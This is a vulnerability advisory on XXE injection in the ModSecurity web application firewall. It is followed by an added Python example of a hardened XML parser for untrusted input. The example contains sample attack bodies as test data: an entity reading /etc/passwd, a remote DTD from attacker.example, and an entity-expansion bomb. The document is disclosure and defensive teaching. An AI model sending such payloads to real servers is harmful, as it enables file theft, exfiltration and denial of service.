PT-2013-22: XML External Entity Injection in Trustwave ModSecurity

Vulnerable software
Trustwave ModSecurity
Version: 2.7.2 and earlier
Application link: http://www.modsecurity.org

Severity level
Severity level: High
Impact: Internal Network Resources and File System Access, Denial of Service
Access Vector: Remote
CVSS v2:
  Base Score: 10
  Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVE: not assigned

Software description
Trustwave ModSecurity is a web application firewall that operates at the application layer (HTTP).

Vulnerability description
Positive Research Center experts have discovered an "XML External Entity Injection" (XXE) vulnerability in Trustwave ModSecurity. ModSecurity parses request bodies it treats as XML in order to inspect them, and in the affected versions that parser resolved external entities. An attacker who sends a specially crafted request whose XML body declares external entities (for example a SYSTEM entity pointing at a local file or an internal network URL) causes the server running ModSecurity to read those local or remote resources and, through an entity that references the attacker's own host, to send their contents to a server the attacker controls. The same mechanism can be used for denial of service, for instance by pointing an entity at a resource that never stops returning data or by declaring entities that expand recursively.

Note that the request does not need to reach a vulnerable application: the firewall itself processes the entities while inspecting the request, so any host that sends XML bodies to ModSecurity's XML body processor is exposed.

How to fix
Update to a fixed version; the vendor released one on 29.03.2013 (see Advisory status). Until the update is deployed, exposure is limited to requests that ModSecurity hands to its XML request body processor (typically selected by a rule using ctl:requestBodyProcessor=XML for XML content types), so not selecting that processor for untrusted clients reduces exposure at the cost of not inspecting XML bodies.

Advisory status
27.02.2013 - Vendor gets vulnerability details
29.03.2013 - Vendor releases fixed version and details
01.04.2013 - Public disclosure

Credits
The vulnerability was discovered by Timur Yunusov and Alexey Osipov, Positive Research Center (Positive Technologies Company).

References
http://en.securitylab.ru/lab/PT-2013-22

Reports on the vulnerabilities previously discovered by Positive Research:
http://ptsecurity.com/research/advisory/
http://en.securitylab.ru/lab/
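The advisory describes two outcomes of the same parser behaviour: resolution of external entities (local file and network access, with out-of-band exfiltration to the attacker's host) and entity-driven denial of service. The check a practitioner wants to see is what an XML consumer that refuses both looks like before any entity is expanded. The block below is an added example written for this page; it is not ModSecurity's code or its fix, and it uses Python's standard-library expat binding rather than the libxml2 API ModSecurity is built on. The four request bodies, the tag names and the MAX_ENTITY_DECLS cap are constructed for illustration.

```python
# Added example (not ModSecurity code): an expat-based parser for untrusted XML
# that rejects the DTD constructs behind XXE resource access and entity-expansion
# denial of service at declaration time, i.e. before anything is fetched or expanded.
import re
import xml.parsers.expat as expat

MAX_ENTITY_DECLS = 16  # arbitrary cap chosen for this example
_ENTITY_REF = re.compile(r"&[A-Za-z_:][\w.:-]*;")


class UnsafeXML(ValueError):
    """The document declares something a service must not process from a client."""


def safe_parse(data: bytes) -> dict:
    """Parse untrusted XML and return {tag: text}; raise UnsafeXML on XXE-style DTDs."""
    parser = expat.ParserCreate()
    # Never read parameter entities or an external DTD subset.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    decls = 0
    stack, texts = [], {}

    def start_doctype(name, sysid, pubid, has_internal_subset):
        # <!DOCTYPE x SYSTEM "http://..."> would pull a remote DTD.
        if sysid is not None or pubid is not None:
            raise UnsafeXML(f"external DTD subset for {name!r}: {sysid or pubid}")

    def entity_decl(name, is_param, value, base, sysid, pubid, notation):
        nonlocal decls
        decls += 1
        if decls > MAX_ENTITY_DECLS:
            raise UnsafeXML("too many entity declarations")
        if sysid is not None or pubid is not None:
            # <!ENTITY xxe SYSTEM "file:///etc/passwd">: local or remote resource access.
            raise UnsafeXML(f"external entity {name!r}: {sysid or pubid}")
        if value is not None and _ENTITY_REF.search(value):
            # Entities whose replacement text references other entities are the
            # "billion laughs" expansion shape; refuse them before any expansion.
            raise UnsafeXML(f"entity {name!r} references other entities")

    def external_ref(context, base, sysid, pubid):
        return 0  # belt and braces: refusing makes expat abort the parse

    def start_element(tag, attrs):
        stack.append(tag)
        texts.setdefault(tag, "")

    def char_data(text):
        if stack:
            texts[stack[-1]] += text

    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_ref
    parser.StartElementHandler = start_element
    parser.EndElementHandler = lambda tag: stack.pop()
    parser.CharacterDataHandler = char_data

    parser.Parse(data, True)
    return texts


def verdict(data: bytes):
    """Inspection result for one request body: ("ok", tree), ("blocked", why) or ("malformed", why)."""
    try:
        return ("ok", safe_parse(data))
    except UnsafeXML as exc:
        return ("blocked", str(exc))
    except expat.ExpatError as exc:
        return ("malformed", str(exc))


# Constructed request bodies (not from the advisory).
BENIGN = (b'<?xml version="1.0"?><!DOCTYPE order [<!ENTITY vendor "Acme">]>'
          b'<order><id>42</id><vendor>&vendor;</vendor></order>')
XXE_FILE = (b'<!DOCTYPE order [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
            b'<order><id>&xxe;</id></order>')
XXE_REMOTE_DTD = b'<!DOCTYPE order SYSTEM "http://attacker.example/evil.dtd"><order/>'
EXPANSION_BOMB = (b'<!DOCTYPE order [<!ENTITY lol "lol">'
                  b'<!ENTITY lol2 "&lol;&lol;&lol;&lol;">'
                  b'<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;">]><order>&lol3;</order>')

if __name__ == "__main__":
    for body in (BENIGN, XXE_FILE, XXE_REMOTE_DTD, EXPANSION_BOMB):
        print(verdict(body))
```

The design point is where the decision is taken: every rejection happens inside a DTD declaration callback, so a SYSTEM entity is refused before the parser has any reason to open a file or a socket, and a recursive entity is refused before its first expansion. Checking the parsed output for a leaked file would be too late, since by then the resource has already been read and, in the out-of-band case, already sent.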